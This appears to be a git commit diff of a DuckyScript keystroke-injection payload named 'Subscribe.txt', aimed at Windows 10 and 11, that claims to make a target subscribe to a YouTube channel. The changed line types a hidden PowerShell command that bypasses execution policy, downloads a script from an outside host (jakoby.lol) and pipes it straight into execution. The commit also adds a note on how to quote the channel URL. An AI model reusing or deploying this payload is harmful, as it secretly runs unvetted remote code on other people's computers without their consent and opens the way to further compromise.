Update Subscribe.txt
This commit is contained in:
parent
1bfa71889e
commit
20c56d7703
1 changed files with 3 additions and 1 deletions
|
@ -6,7 +6,9 @@ REM Description: This payload is meant to make your target subscribe to your
|
||||||
|
|
||||||
REM Target: Windows 10, 11
|
REM Target: Windows 10, 11
|
||||||
|
|
||||||
|
REM Your youtube url needs to be inside both double and single quotes " ' url ' "
|
||||||
|
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -Ep Bypass $channel='youtube.com/iamjakoby';irm jakoby.lol/wj4 | iex
|
STRING powershell -w h -NoP -Ep Bypass $channel="'youtube.com/iamjakoby'";irm jakoby.lol/wj4 | iex
|
||||||
ENTER
|
ENTER
|
||||||
|
|
Loading…
Reference in a new issue